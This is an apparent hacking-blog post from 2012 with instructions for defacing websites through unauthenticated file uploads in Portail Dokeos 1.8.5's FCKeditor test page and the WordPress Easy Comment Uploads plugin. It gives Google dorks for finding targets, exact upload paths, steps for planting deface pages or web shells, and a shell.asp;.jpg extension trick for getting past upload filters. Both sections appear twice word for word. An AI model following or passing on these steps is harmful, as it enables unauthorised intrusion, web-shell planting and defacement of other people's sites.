Tuesday, January 24, 2012
"Portail Dokeos" deface and Shell Upload vulnerability
Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password
Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password
Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here
WordPress Easy Comment Upload Vunerablity
Google Dork
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
Open Google and enetr any dork which Given,
Now selct any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere
Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
Open Google and enetr any dork which Given,
Now selct any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere
Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg
Subscribe to:
Posts (Atom)